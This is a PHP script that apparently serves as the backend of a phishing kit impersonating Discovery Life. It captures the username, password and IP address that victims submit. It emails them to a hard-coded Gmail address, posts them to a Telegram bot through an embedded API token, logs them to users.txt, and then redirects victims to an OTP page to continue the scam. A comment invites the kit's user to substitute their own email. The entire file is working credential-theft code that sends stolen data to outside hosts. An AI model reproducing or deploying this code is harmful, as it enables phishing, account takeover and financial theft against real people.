<?php
$Username = $_POST['Username'];
$Password = $_POST['Password'];
$ip_address = $_SERVER['REMOTE_ADDR']; // Grabbing the IP address

// Please change email to your email
$to = "billylife901@gmail.com";
$subject = "Discov - Safety 2026";
$from = "Legal Information";
$header = "From: " . $from;

$data = "Discov_Username : $Username \r\n\r\nDiscov_Pass: $Password \r\n\r\n

IP Address: $ip_address \r\n\r\n********Discovery Life********\r\n\r\n";
mail($to, $subject, $data);

// Send data to Telegram
$telegram_api_token = "7926952320:AAF_J0mo6_oqFBX0KuZI7EXCoSKZhWD8z_I";
$telegram_chat_id = "7731692743";
$telegram_message = urlencode($data);
file_get_contents("https://api.telegram.org/bot$telegram_api_token/sendMessage?chat_id=$telegram_chat_id&text=$telegram_message");

$fh = fopen("users.txt", "a");
fwrite($fh, $data); // Close the file
fclose($fh);

header("Location: Otp.html");
?>
